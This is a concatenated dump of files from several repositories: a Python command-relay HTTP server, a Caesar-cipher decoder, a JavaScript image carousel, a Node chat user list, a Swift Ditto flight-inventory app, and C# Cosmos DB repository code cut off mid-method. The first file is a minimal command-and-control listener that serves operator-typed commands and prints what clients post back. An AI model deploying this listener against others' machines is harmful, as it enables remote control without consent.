<file_sep>import http.server
HOST = "Your Server is here"
PORT = 8080
class RequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
command = input("[Prompt]> ")
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(command.encode())
def do_POST(self):
self.send_response(200)
self.end_headers()
length = int(self.headers['Content-length'])
res_body = self.rfile.read(length)
print(res_body.decode())
def main():
http_server = http.server.HTTPServer
httpd = http_server((HOST, PORT), RequestHandler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print('[!] Stopped.')
httpd.server_close()
if __name__ == "__main__":
main()
<file_sep>def decrypt(cipher_text, key):
ret = ""
for ch in list(cipher_text):
if 'A' <= ch <= 'Z':
ret += chr((ord(ch) - ord('A') + key) % 26 + ord('A'))
elif 'a' <= ch <= 'z':
ret += chr((ord(ch) - ord('a') + key) % 26 + ord('a'))
else:
ret += ch
return ret
def main():
cipher_text = input("Enter Caesar cipher : ")
for i in range(1, 26):
print('{0:2d}'.format(i) + " : " + decrypt(cipher_text, i))
if __name__ == '__main__':
main() | eb02bb05c15e8195dafcd346123183f613c9452c | [
"Markdown",
"Python"
] | 11 | Python | SILKYMAJOR/practice_python | 7020914e2fba47b122a0d528d903008ff6738cd0 | beed451bdfa2eefac86af0df37c16cb2b9842948 |
refs/heads/master | <file_sep>/**
* Created by Administrator on 2017/2/11.
*/
var carousel = document.getElementById('carousel');
console.log(carousel);
//获取相框宽度
var cWidth = carousel.clientWidth;
console.log(cWidth);
//获得所有图片,根据图片的索引设置每张图片的位置。
var imgs = $('img');
console.log(imgs);
for (let i = 0; i < imgs.length; i++) {
imgs[i].style.left = i * cWidth + 'px';
}
//定义一个变量,用于记录当前显示的是第几页。
var page = 0;
//开启定时器,每隔1秒,让所有图片向左移动640像素(图大小)。
var timer = setInterval(moveLeft, 3000);
//向左移动函数
// Advance one page to the left (next image), clamping at the last page,
// then run the slide animation.
function moveLeft() {
    page++;
    if (page > imgs.length - 1) {
        page = imgs.length - 1;
    }
    move()
}
//向右移动函数
// Go back one page to the right (previous image), clamping at page 0,
// then run the slide animation.
function moveRight() {
    page--;
    if (page < 0) {
        page = 0
    }
    move()
}
//轮播图移动函数
// Slide every image into place for the current page. After the 0.7s CSS
// transition finishes: if the last page was shown, snap back to page 0
// without animation, then update the highlighted page dot.
function move() {
    for (var i = 0; i < imgs.length; i++) {
        // Position each image relative to the page currently shown.
        imgs[i].style.left = (i - page) * cWidth + 'px';
    }
    setTimeout(function () {
        // Animation finished: if this was the last image, jump back to
        // page 0 instantly (no animation) to fake an endless loop.
        if (page == imgs.length - 1) {
            page = 0;
            // Drop the transition on all images first - the jump back to
            // the first image must not animate.
            for (var j = 0; j < imgs.length; j++) {
                imgs[j].style.transition = 'none';
            }
            // Snap every image back to its initial position.
            for (var j = 0; j < imgs.length; j++) {
                imgs[j].style.left = (j - page) * cWidth + 'px';
            }
            // Re-enable the transition slightly later; re-adding it before
            // the next UI refresh would make the snap-back animate after all.
            setTimeout(function () {
                for (var j = 0; j < imgs.length; j++) {
                    imgs[j].style.transition = "left 0.7s ease-in-out";
                }
            }, 100)
        }
        // Whether or not it was the last image, update the page dots.
        pageC.setPage(page);
    }, 700);
}
//~~~~~~~~~~~~~~~设置小白点~~~~~~~~~~~~~
var cHeight = carousel.clientHeight;
//设置白点的位置
var pageC = document.querySelectorAll('.pageControl');
console.log(pageC);
for (var i = 0; i < pageC.length; i++) {
//给每一个小圆点div设置一个索引,这样当小圆点点击时,
//我们就可以通过事件的target确定时哪个小圆点被点击,
//再通过小圆点的索引就能知道第几个被点击。
pageC[i].index = i;
pageC[i].style.top = '90%';
pageC[i].style.left = (cWidth / 2 + i * 20) - (pageC.length * 10 + (pageC.length - 1) * 10) / 2 + "px";
pageC[i].onclick = function (e) {
//当某个小圆点被点击时,就把当前页数设置为小圆点的索引
page = e.target.index;
//执行移动函数
move();
//为了保证每次通过小圆点手动翻页后不立刻执行定时器
//翻页,先把定时器关闭,再打开,这样定时器就会
//重新计时。
clearInterval(timer);
timer = setInterval(moveLeft, 3000);
}
}
//为pageC对象添加一个函数,用于设置当前的页数(哪个小白点变白)
// Highlight the dot for page p: clear every dot, then mark the current one.
pageC.setPage = function (p) {
    // Reset all dots to transparent first.
    for (var i = 0; i < this.length; i++) {
        this[i].style.backgroundColor = "";
    }
    // Then colour the dot for the current page.
    this[p].style.backgroundColor = "black";
};
pageC.setPage(0);
//~~~~~~~~~~~~~~~设置左右箭头~~~~~~~~~~~~~~~~
var leftArrow = document.createElement('div');
leftArrow.classList.add("arrow");
leftArrow.innerHTML = "<<";
carousel.appendChild(leftArrow);
leftArrow.style.background = "linear-gradient(to right,rgba(0,0,0,0.5),rgba(0,0,0,0))";
var rightArrow = document.createElement('div');
rightArrow.classList.add("arrow");
rightArrow.innerHTML = ">>";
carousel.appendChild(rightArrow);
rightArrow.style.right = "0";
rightArrow.style.background = "linear-gradient(to left,rgba(0,0,0,0.5),rgba(0,0,0,0))";
leftArrow.onclick = function () {
clearInterval(timer);
timer = setInterval(moveLeft, 3000);
moveRight();
};
rightArrow.onclick = function () {
clearInterval(timer);
timer = setInterval(moveLeft, 3000);
moveLeft();
};
| e479e5f3c4628b17d66ca95640c31b840c4fe460 | [
"JavaScript"
] | 1 | JavaScript | ChenJIE1993/js--Carousel-figure | 9f6ed2ad7aaaba4c700c3886d1783830e807dcd5 | a698173c440ca9a4e1cefebe41f2d0a85f555765 |
refs/heads/master | <file_sep>//instead of using a database I use a simple array to track what users are in a room and how this state changes.
const users = [];
const addUser = ({id, name, room}) => {
//to have a specific format: from <NAME> to johnkoukoulakis
name = name.trim().toLowerCase();
room = room.trim().toLowerCase();
//to check if a user with the same name exists in the same room
const existingUser = users.find((user) => user.room === room && user.name === name);
//if truthy returns an error object and exits addUser function
if(!name || !room) return {error: 'Username and room are required'};
if(existingUser) return { error: 'Username is already taken'};
//else adds an object with all the parameters in the users array and exits
const user = { id, name, room };
users.push(user);
console.log(user)
return {user};
};
// Remove and return the user with the given socket id; undefined when absent.
const removeUser = (id) => {
    const idx = users.findIndex((u) => u.id === id);
    if (idx === -1) return undefined;
    return users.splice(idx, 1)[0];
};
// Single-user lookup by socket id.
const getUser = (userId) => users.find((u) => u.id === userId);
// Every user currently joined to the given room.
const getUsersInRoom = (roomName) => users.filter((u) => u.room === roomName);
module.exports = { addUser, removeUser, getUser, getUsersInRoom }; | 77dfdb02b1adcde232ad57e905231f4173b3005d | [
"JavaScript"
] | 1 | JavaScript | koukoujohn/react-chat-app | 27f53fa56b2801901d4f096f3a043e07c716d0ca | f777dca09dda2776966cfe4100f6b4419665e4c0 |
refs/heads/master | <repo_name>getditto/Inventory-Sample-App<file_sep>/flight-inventory/Model/FlightInfo.swift
import Foundation
/// Identity of a selectable flight; `name` doubles as the Ditto collection
/// name holding that flight's inventory (see InventoryViewController.collection).
struct FlightInfo {
let name: String
}
<file_sep>/flight-inventory/Model/UserInfo.swift
import Foundation
/// The signed-in user. `isAdmin` gates the add/remove-all inventory actions.
struct UserInfo {
let name: String
let isAdmin: Bool
}
<file_sep>/flight-inventory/Inventory/InventoryTableViewCell.swift
import UIKit
/// Row showing one inventory item: its name, current count, and a stepper to adjust it.
final class InventoryTableViewCell: UITableViewCell {
@IBOutlet private(set) weak var nameLabel: UILabel!
@IBOutlet private(set) weak var countLabel: UILabel!
@IBOutlet private(set) weak var stepper: CustomStepper! {
// Clamp the adjustable range as soon as the outlet is connected.
didSet {
stepper.minimumValue = 0
stepper.maximumValue = 99
}
}
}
/// UIStepper that remembers which table row it belongs to, so the shared
/// target-action handler can map a value change back to its document.
final class CustomStepper: UIStepper {
var indexPath: IndexPath?
}
<file_sep>/flight-inventory/Connection/ConnectionTableViewCell.swift
import UIKit
/// Row showing one peer connection: remote device name plus the transport type.
final class ConnectionTableViewCell: UITableViewCell {
@IBOutlet private(set) weak var deviceNameLabel: UILabel!
@IBOutlet private(set) weak var connectionTypeLabel: UILabel!
}
<file_sep>/flight-inventory/FlightList/FlightListViewController.swift
import UIKit
/// Lets the user pick one of the hard-wired flights and drills into its inventory.
final class FlightListViewController: UIViewController {
    @IBOutlet private var flightButtons: [UIButton]!

    /// Logged-in user, forwarded unchanged to the inventory screen.
    private let userInfo: UserInfo

    init?(coder: NSCoder, userInfo: UserInfo) {
        self.userInfo = userInfo
        super.init(coder: coder)
    }

    required init?(coder: NSCoder) {
        fatalError()
    }

    override func viewDidLoad() {
        super.viewDidLoad()
        setupUI()
    }

    /// Titles the screen and wires every flight button to the tap handler.
    private func setupUI() {
        title = "Flight List"
        for button in flightButtons {
            button.layer.cornerRadius = 8
            button.addTarget(self, action: #selector(didTapFlightButton), for: .touchUpInside)
        }
    }

    /// Pushes the inventory screen for the flight named by the tapped button.
    @objc private func didTapFlightButton(_ sender: UIButton) {
        let flight = FlightInfo(name: sender.titleLabel?.text ?? "")
        let storyboard = UIStoryboard(name: "Inventory", bundle: nil)
        let destination = storyboard.instantiateInitialViewController(creator: { coder in
            InventoryViewController(coder: coder, userInfo: self.userInfo, flightInfo: flight)
        })
        if let destination = destination {
            navigationController?.pushViewController(destination, animated: true)
        }
    }
}
<file_sep>/flight-inventory/Inventory/InventoryViewController.swift
import UIKit
import DittoSwift
/// Shows the inventory documents for one flight and lets the user adjust counts.
/// The flight name doubles as the Ditto collection name.
final class InventoryViewController: UIViewController {
    @IBOutlet private weak var tableView: UITableView!

    private let userInfo: UserInfo
    private let flightInfo: FlightInfo
    /// Active Ditto observation; (re)started on appearance, stopped on disappearance.
    private var liveQuery: DittoLiveQuery?
    private var inventories = [DittoDocument]()

    /// Collection backing this screen — one collection per flight.
    private var collection: DittoCollection {
        return DittoHandler.ditto.store.collection(flightInfo.name)
    }

    init?(coder: NSCoder, userInfo: UserInfo, flightInfo: FlightInfo) {
        self.userInfo = userInfo
        self.flightInfo = flightInfo
        super.init(coder: coder)
    }

    required init?(coder: NSCoder) {
        fatalError()
    }

    override func viewDidLoad() {
        super.viewDidLoad()
        setupUI()
        // BUGFIX: observe() is deliberately NOT called here. viewWillAppear(_:)
        // always follows viewDidLoad(), so the old double call replaced the first
        // live query without stopping it, leaking an observer.
    }

    override func viewWillAppear(_ animated: Bool) {
        super.viewWillAppear(animated)
        observe()
    }

    override func viewWillDisappear(_ animated: Bool) {
        super.viewWillDisappear(animated)
        liveQuery?.stop()
        liveQuery = nil
    }

    private func setupUI() {
        title = flightInfo.name
        let nib = UINib(nibName: "InventoryTableViewCell", bundle: nil)
        tableView.register(nib, forCellReuseIdentifier: "InventoryTableViewCell")
        tableView.tableFooterView = UIView()
        tableView.delegate = self
        tableView.dataSource = self
        navigationItem.rightBarButtonItem = UIBarButtonItem(
            image: UIImage(systemName: "ellipsis"),
            style: .done,
            target: self,
            action: #selector(didTapMore)
        )
    }

    /// (Re)starts the live query that mirrors the collection into `inventories`.
    private func observe() {
        liveQuery?.stop() // defensive: never orphan a previous observer
        liveQuery = collection.findAll().observe { [weak self] docs, event in
            guard let self = self else { return }
            self.inventories = docs
            self.tableView.reloadData()
        }
    }

    /// Applies the stepper's delta to the document's "count" counter.
    @objc private func didTapStepper(_ sender: CustomStepper) {
        guard let indexPath = sender.indexPath else { return }
        let newCount = sender.value
        let inventory = inventories[indexPath.row]
        let oldCount = Double(inventory["count"].intValue)
        let gap = newCount - oldCount
        collection.findByID(inventory.id).update { doc in
            // NOTE(review): replaceWithCounter() before every increment — assumed
            // idempotent on an existing counter; confirm against the Ditto SDK docs.
            doc?["count"].replaceWithCounter()
            doc?["count"].increment(amount: gap)
        }
        tableView.reloadRows(at: [indexPath], with: .none)
    }
}
// Table plumbing: one row per inventory document.
extension InventoryViewController: UITableViewDelegate, UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return inventories.count
}
/// Binds name/count and points the row's stepper back at this index path.
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
// Force-cast is safe: the cell class is registered for this identifier in setupUI().
let cell = tableView.dequeueReusableCell(withIdentifier: "InventoryTableViewCell", for: indexPath) as! InventoryTableViewCell
let inventory = inventories[indexPath.row]
cell.nameLabel.text = inventory["name"].stringValue
let count = inventory["count"].intValue
cell.countLabel.text = String(count)
// NOTE(review): addTarget runs on every reuse — assumed UIControl ignores a
// duplicate target/action/event registration; confirm against UIKit docs.
cell.stepper.addTarget(self, action: #selector(didTapStepper), for: .valueChanged)
cell.stepper.indexPath = indexPath
cell.stepper.value = Double(count)
return cell
}
}
// MARK: - More Button
/// Overflow action sheet plus the admin-gated mutations it triggers.
extension InventoryViewController {
/// Presents the overflow menu (anchored as a centered popover on iPad).
@objc private func didTapMore() {
let alert = UIAlertController(title: nil, message: nil, preferredStyle: .actionSheet)
alert.addAction(UIAlertAction(title: "Add Inventory", style: .default) { _ in
self.didTapAdd()
})
alert.addAction(UIAlertAction(title: "Show Connection", style: .default) { _ in
self.didTapConnection()
})
alert.addAction(UIAlertAction(title: "Remove All Inventory", style: .destructive) { _ in
self.didTapRemoveAll()
})
alert.addAction(UIAlertAction(title: "Logout", style: .destructive) { _ in
self.didTapLogout()
})
if UIDevice.current.userInterfaceIdiom == .pad {
alert.popoverPresentationController?.sourceView = view
alert.popoverPresentationController?.sourceRect = CGRect(x: view.bounds.midX, y: view.bounds.midY, width: 0, height: 0)
alert.popoverPresentationController?.permittedArrowDirections = []
}
present(alert, animated: true)
}
/// Prompts for a new item name and inserts it with a zero counter (admin only).
@objc private func didTapAdd() {
guard userInfo.isAdmin else {
showNonAdminAlert(); return
}
let alert = UIAlertController(title: "New Inventory", message: nil, preferredStyle: .alert)
alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
alert.addAction(UIAlertAction(title: "OK", style: .default) { [weak self] _ in
guard let self = self else { return }
guard let text = alert.textFields?.first?.text else { return }
// Empty name: re-present the dialog (previously typed text is discarded).
guard !text.isEmpty else {
self.didTapAdd(); return
}
// NOTE(review): try? silently drops insert failures (e.g. duplicate id).
let docID = try? self.collection.insert(
["name": text, "count": 0]
)
if let docID = docID {
self.collection.findByID(docID).update { doc in
doc?["count"].replaceWithCounter(isDefault: true)
}
}
self.tableView.reloadData()
})
alert.addTextField { field in
field.placeholder = "New inventory name"
field.keyboardType = .default
}
present(alert, animated: true)
}
/// Confirms, then removes every document in the collection (admin only).
@objc private func didTapRemoveAll() {
guard userInfo.isAdmin else {
showNonAdminAlert(); return
}
let alert = UIAlertController(
title: "Do you want to remove all?",
message: nil,
preferredStyle: .alert
)
alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
alert.addAction(UIAlertAction(title: "OK", style: .destructive) { [weak self] _ in
guard let self = self else { return }
self.collection.findAll().remove()
})
present(alert, animated: true)
}
/// Pushes the live peer-connections screen.
@objc private func didTapConnection() {
let sb = UIStoryboard(name: "Connections", bundle: nil)
let destination = sb.instantiateInitialViewController { coder in
ConnectionListViewController(coder: coder)
}
if let destination = destination {
navigationController?.pushViewController(destination, animated: true)
}
}
/// Pops back to the login screen.
@objc private func didTapLogout() {
navigationController?.popToRootViewController(animated: true)
}
private func showNonAdminAlert() {
let alert = UIAlertController(
title: "Editing is only allowed to admin",
message: nil,
preferredStyle: .alert
)
alert.addAction(UIAlertAction(title: "OK", style: .cancel))
present(alert, animated: true)
}
}
<file_sep>/README.md
# Inventory-Sample-App
Sample inventory app using DittoSyncKit
Run `pod install --repo-update` to install the project's dependencies before building.
||||
|--|--|--|
||||
||||
<file_sep>/flight-inventory/DittoHandler.swift
import Foundation
import DittoSwift
/// Owns the process-wide Ditto instance, configured and started on first access.
final class DittoHandler {
    /// Replace with a real license before shipping.
    private static let accessLicense = "Insert your access license!"

    static private(set) var ditto: Ditto = {
        // Verbose logging while developing.
        DittoLogger.minimumLogLevel = .debug
        // Development identity keyed by the app name
        // (a bare `Ditto()` would also work).
        let instance = Ditto(identity: .development(appName: "live.ditto.flight-inventory"))
        instance.setAccessLicense(DittoHandler.accessLicense)
        // Enable every transport for the best peer-to-peer coverage.
        instance.start(transports: [.awdl, .bluetooth, .wifi])
        return instance
    }()
}
<file_sep>/flight-inventory/Model/Connection.swift
import Foundation
/// One row of the connections screen: a remote peer and the transport linking us to it.
struct Connection {
let deviceName: String
let connectionType: String
}
<file_sep>/flight-inventory/Connection/ConnectionListViewController.swift
import UIKit
import DittoSwift
/// Live list of the peers this device is currently connected to.
final class ConnectionListViewController: UIViewController {
    @IBOutlet private weak var tableView: UITableView!

    private var connections: [Connection] = []
    private var peerObserver: DittoPeersObserver?

    override func viewDidLoad() {
        super.viewDidLoad()
        setupUI()
        observePeers()
    }

    override func viewWillDisappear(_ animated: Bool) {
        super.viewWillDisappear(animated)
        // Releasing the observer ends peer callbacks.
        peerObserver = nil
    }

    private func setupUI() {
        title = "Connections"
        let nib = UINib(nibName: "ConnectionTableViewCell", bundle: nil)
        tableView.register(nib, forCellReuseIdentifier: "ConnectionTableViewCell")
        tableView.tableFooterView = UIView()
        tableView.delegate = self
        tableView.dataSource = self
    }

    /// Rebuilds `connections` — one row per (peer, transport) pair — on every update.
    private func observePeers() {
        peerObserver = DittoHandler.ditto.observePeers { [weak self] peers in
            guard let self = self else { return }
            self.connections = peers.flatMap { peer in
                peer.connections.map { Connection(deviceName: peer.deviceName, connectionType: $0) }
            }
            self.tableView.reloadData()
        }
    }
}
// Table plumbing: one row per (peer, transport) connection.
extension ConnectionListViewController: UITableViewDelegate, UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return connections.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
// Force-cast is safe: the cell class is registered for this identifier in setupUI().
let cell = tableView.dequeueReusableCell(withIdentifier: "ConnectionTableViewCell", for: indexPath) as! ConnectionTableViewCell
let connection = connections[indexPath.row]
cell.deviceNameLabel?.text = connection.deviceName
cell.connectionTypeLabel?.text = connection.connectionType
return cell
}
}
<file_sep>/flight-inventory/Login/LoginViewController.swift
import UIKit
import DittoSwift
/// Collects a username plus admin flag, stamps the Ditto device name, and moves
/// on to the flight list.
final class LoginViewController: UIViewController {
    @IBOutlet private weak var usernameTextField: UITextField!
    @IBOutlet private weak var adminSwitch: UISwitch!
    @IBOutlet private weak var loginButton: UIButton!
    // (Removed an unused `isAdmin` stored property — the switch is read directly.)

    override func viewDidLoad() {
        super.viewDidLoad()
        setupUI()
    }

    private func setupUI() {
        title = "Login"
        loginButton.addTarget(self, action: #selector(didTapLogin), for: .touchUpInside)
        loginButton.layer.cornerRadius = 8
    }

    /// Validates the username and pushes the flight list on success.
    @objc private func didTapLogin() {
        // nil and "" both reject with the same alert (previously two guards).
        guard let username = usernameTextField.text, !username.isEmpty else {
            showEmptyUsernameAlert()
            return
        }
        // Shown to peers as this device's name on the Connections screen.
        Ditto.deviceName = username
        let userInfo = UserInfo(name: username, isAdmin: adminSwitch.isOn)
        let storyboard = UIStoryboard(name: "Flight", bundle: nil)
        let destination = storyboard.instantiateInitialViewController { coder in
            FlightListViewController(coder: coder, userInfo: userInfo)
        }
        if let destination = destination {
            navigationController?.pushViewController(destination, animated: true)
        }
    }

    @objc private func showEmptyUsernameAlert() {
        let alert = UIAlertController(
            title: "Username is Empty",
            message: nil,
            preferredStyle: .alert
        )
        alert.addAction(UIAlertAction(title: "OK", style: .cancel))
        present(alert, animated: true)
    }
}
| c9047acca09a0950cc9ddc7948421b072eac7f3c | [
"Swift",
"Markdown"
] | 11 | Swift | getditto/Inventory-Sample-App | baa3ede1ab28e5bf050526cbed06bc7f068288e8 | c3e788f0ccb2b5ba050ab09913e8802083315373 |
refs/heads/master | <file_sep>using CosmosDbRepository;
using CosmosDbRepository.Types;
using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
namespace CosmosDbRepositoryTest
{
/// <summary>
/// Equality semantics of DocumentId against its three supported underlying types.
/// Each test now also exercises the negative case — previously only equality with
/// the identical value was asserted, so a DocumentId that compared equal to
/// everything would still have passed.
/// </summary>
[TestClass]
public class CosmosDocumentIdTest
{
    [TestMethod]
    public void GuidIdTests()
    {
        Guid value = Guid.NewGuid();
        DocumentId id = value;

        (id == value).Should().BeTrue();
        (id != value).Should().BeFalse();
        id.Equals(value).Should().BeTrue();
        id.Equals((object)value).Should().BeTrue();

        // Negative case: a different Guid must not compare equal.
        Guid other = Guid.NewGuid();
        (id == other).Should().BeFalse();
        (id != other).Should().BeTrue();
        id.Equals(other).Should().BeFalse();
    }

    [TestMethod]
    public void StringIdTests()
    {
        string value = "MyId";
        DocumentId id = value;

        (id == value).Should().BeTrue();
        (id != value).Should().BeFalse();
        id.Equals(value).Should().BeTrue();
        id.Equals((object)value).Should().BeTrue();

        // Negative case: a different string must not compare equal.
        string other = "OtherId";
        (id == other).Should().BeFalse();
        (id != other).Should().BeTrue();
        id.Equals(other).Should().BeFalse();
    }

    [TestMethod]
    public void IntIdTests()
    {
        int value = 123;
        DocumentId id = value;

        (id == value).Should().BeTrue();
        (id != value).Should().BeFalse();
        id.Equals(value).Should().BeTrue();
        id.Equals((object)value).Should().BeTrue();

        // Negative case: a different int must not compare equal.
        int other = 456;
        (id == other).Should().BeFalse();
        (id != other).Should().BeTrue();
        id.Equals(other).Should().BeFalse();
    }
}
}
<file_sep>using Microsoft.Azure.Documents.Client;
using System.Threading.Tasks;
namespace CosmosDbRepository
{
/// <summary>
/// Facade over one Cosmos DB database and its configured repositories (collections).
/// </summary>
public interface ICosmosDb
{
/// <summary>Self-link of the database; the database is created lazily on first await.</summary>
Task<string> SelfLinkAsync { get; }
/// <summary>Repository whose document type is T. Resolved via Enumerable.First in the
/// implementation, so it throws InvalidOperationException when none was configured.</summary>
ICosmosDbRepository<T> Repository<T>();
/// <summary>Repository with the given collection id; same First() semantics as above.</summary>
ICosmosDbRepository<T> Repository<T>(string id);
/// <summary>Deletes the whole database; true when the service answers 204 NoContent.</summary>
Task<bool> DeleteAsync(RequestOptions options = null);
// If you do not call init then the database and repositories
// will be constructed as needed
Task Init();
}
}
<file_sep>using Microsoft.Azure.Documents;
using Newtonsoft.Json;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepository.Implementation
{
/// <summary>
/// Shared state for the generic stored-procedure wrappers: the document client plus
/// the lazily resolved sproc URI ("{collection altLink}/sprocs/{id}").
/// </summary>
internal abstract class StoreProcedureImpl
{
protected readonly IDocumentClient Client;
// Lazy so that construction never awaits the repository's AltLink.
protected readonly AsyncLazy<Uri> StoredProcUri;
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
{
Client = client;
StoredProcUri = new AsyncLazy<Uri>(() => GetStoredProcUri(repository, id));
}
private async Task<Uri> GetStoredProcUri(ICosmosDbRepository repository, string id)
{
return new Uri($"{await repository.AltLink}/sprocs/{Uri.EscapeUriString(id)}", UriKind.Relative);
}
}
// Stored-procedure wrapper arity ladder (0-16 parameters). Every variant simply
// forwards its arguments to IDocumentClient.ExecuteStoredProcedureAsync using the
// lazily resolved sproc URI from the base class; only the generic list differs.
internal class StoreProcedureImpl<TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync() =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value);
}

internal class StoreProcedureImpl<TParam, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam param) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param);
}

internal class StoreProcedureImpl<TParam1, TParam2, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10) =>
        await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10);
}

internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>
    : StoreProcedureImpl
    , IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>
{
    public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
        : base(client, repository, id) { }

    public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11) =>
